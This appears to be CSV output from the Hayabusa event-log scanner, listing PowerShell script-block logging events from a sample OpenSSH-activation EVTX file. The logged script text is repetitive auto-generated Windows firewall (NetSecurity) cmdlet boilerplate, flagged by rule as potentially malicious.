[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 